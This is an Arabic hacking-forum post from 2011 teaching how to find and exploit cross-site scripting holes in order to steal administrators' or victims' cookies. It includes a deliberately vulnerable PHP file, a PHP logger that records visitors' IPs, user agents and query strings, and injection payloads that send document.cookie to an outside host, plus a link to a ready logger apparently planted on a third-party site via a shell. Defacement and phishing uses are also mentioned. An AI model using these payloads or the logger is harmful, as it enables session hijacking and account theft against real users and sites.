[ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~

bleu moon · 08-21-2011, 03:26 PM

بسم الله الرحمآن الرحيم

ان شاء الله اليوم رح نشرح

\ اكتشاف تغرات xss
\ تعليق الآندكس من تغرات xss
\ سرقة كوكيز من تغرات xss

################

سرقة الكوكيز من تغرات xss

اولا لازم نقوم بتنصيب السيرفر الشخصي ع جهازنا

download

تانيا لازم يكون عندنا الموقع المصاب او السكربت

انا برمجة ملف عادي جدآآ ! مصاب بهذه التغره

نسميه مثلا ..~

xss.php

ومحتواه علشان تجربوآا معي الاستغلال الكامل لها ..~

كود PHP:

  
<?
echo $_GET***91;'test'***93; ;

echo '<b>@nor15din</b>'
?>

طيب الآن نستعرض الملف المصاب مع المتغير !

~~~~~~~~~~~~
على فكره شباب !
تم شرح التغره من قبل في المنتدى ..~
يستحسن انكم تراجعوا هذا الرابط ..~

http://www.vbspiders.com/vb/t24758.html

&

http://www.vbspiders.com/vb/t22376.html
~~~~~~~~~~~~

طيب نتابع

طبعا كيف نكتشف التغره سهل كثير ..~
يعني تضيف الكود هذا

كود PHP:

  
'"--></style></script>***************("Www.VbspiderS.Com")</script>

بعد المتغير ..~
رح ارفق لكم الكود في المرفقات مع كل حاجه !

طيب رح نضغط اوونتر ورح تشوف ان رساله ضهرت لنا في المتصفح ..~

تعال الآن نستفيد من التغره !
اولا التغره تقدر تسرق بها كوكيز الآدمن او الضحيه بصفه عامه ..~
تقدر تحقن اكواد html او تغره للمتصفح ملغومه بباتش علشان تخترق ..~
شو هاي الحلاوه ..~
ههه
انا رح اشرح لكم كيف تسرق الكوكيز ..~
اولا لازمنا ملف لوج علشان يسجل لنا الكوكيز والمعلومات في ملف txt

ملفات اللوج تكون خاصه :(
وهناك ملفات لووج تجيب لك معلومات كامله !
كوكيز + الوقت + التاريخ + ...
وفي نوع آخر عادي ..~
يعطيك الكوكيز فقط !
ههع
رح اعطيكم ملف لووج عندي كثير حلو

طيب نشوف السورس كود بتاعوا ..~

كود PHP:

  
<?php 


function GetIP() 
{ 
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        $ip = getenv("HTTP_CLIENT_IP"); 
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        $ip = getenv("HTTP_X_FORWARDED_FOR"); 
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        $ip = getenv("REMOTE_ADDR"); 
    else if (isset($_SERVER***91;'REMOTE_ADDR'***93;) && $_SERVER***91;'REMOTE_ADDR'***93; && strcasecmp($_SERVER***91;'REMOTE_ADDR'***93;, "unknown")) 
        $ip = $_SERVER***91;'REMOTE_ADDR'***93;; 
    else 
        $ip = "unknown"; 
    return($ip); 
} 

function logData() 
{ 
    $ipLog="nor15din.txt"; 
    $****** = $_SERVER***91;'QUERY_STRING'***93;; 
    $register_globals = (bool) ini_get('register_gobals'); 
    if ($register_globals) $ip = getenv('REMOTE_ADDR'); 
    else $ip = GetIP(); 

    $rem_port = $_SERVER***91;'REMOTE_PORT'***93;; 
    $user_agent = $_SERVER***91;'HTTP_USER_AGENT'***93;; 
    $rqst_method = $_SERVER***91;'METHOD'***93;; 
    $rem_host = $_SERVER***91;'REMOTE_HOST'***93;; 
    $referer = $_SERVER***91;'HTTP_REFERER'***93;; 
    $date=date ("l dS of F Y h:i:s A"); 
    $log=fopen("$ipLog", "a+"); 

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) 
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | ******:  $****** <br>"); 
    else 
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | ******:  $****** \n\n"); 
    fclose($log); 
} 

logData();

echo '<b>powered by vbspiders team</b>'
?>

لازم نرفعوا على شل :(
انا عندي مرفوع على شل ..~

الموقع يلي رفعنا لو الووج رح يكون زي هيك مثلا !

www.vbspiders.com/log.php

ورح يسجل لنا المعلوومات في ملف اسموا nor15din.txt

www.vbspiders.com/nor15din.txt

طيب الآن كيف نستغل التغره ..~

يلزمنى كود تلغيم ..~

كود PHP:

  
"><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script>

or

كود PHP:

  
"><script language= "JavaScript">********.location="http://vbspiders.com/log.php?******=" + ********.******;********.location="http://www.google.com"</script>

حلو !
رح نضيف هذول الاكواد مع تغير مايجب تغيره

اقتباس


	http://localhost/xss.php?test="><a href="#" onclick="******.location='http://vbspiders.com/log.php?**=' +escape(****.****);"><Click Me></a></script>

نضط اوونتر ونروح نفتح الملف nor15din.txt

اقتباس


	IP: \| PORT: 56840 \| HOST: \| Agent: \| METHOD: \| REF: \| DATE: \| ****: ****=

ههههه حلو ..~
ياريت اي واحد ينقل الموضوع ..~
يحافض على الحقوق :(

لتحميل الادواة

~~~~~~~~~~~~~~~~~~

الشي يلي اضفناه وجديد هو اننا شرحنا كل شي تقريبا يتعلق بهذه التغره في فيديوا + صفحه HTML

لتحميل الشرح الكامل على شكل صفحه HTML

لتحميل فيديوا التطبيق

وفي الاخير هذيه بسيطه وهي ملف لوج مرفوووع وجاهز

http://www.illicitromance.com/log.php

وفي هذه الصفحه رح يتم تسجيل الكوكيز + المعلومات

http://www.illicitromance.com/nor15din.txt

ع فكره هذه طريقة اخرى لتعليق آندكس مميز من تغرات

xss

http://www.vbspiders.com/vb/t38054.html

~~~~~~~~~~~~

وهنا طريقة اخرى لاستغلال التغره مشروحة من طرف حبيبنا

IronMan

جديد استخدامات xss وهي الـ phishing login

بالتوفيق ..
@nor15din

المصدر: :: vBspiders Professional Network ::

F jl hgj[]d] D Z avp ;hlg lj;hlg gjyvhj xss | hpjvhtd >>Z la;gi l,q,u l,ru g;k hg]dk hgw,v hpjvht hsjtshv []d] vtu avp

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

[ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~

حقن xss - ssi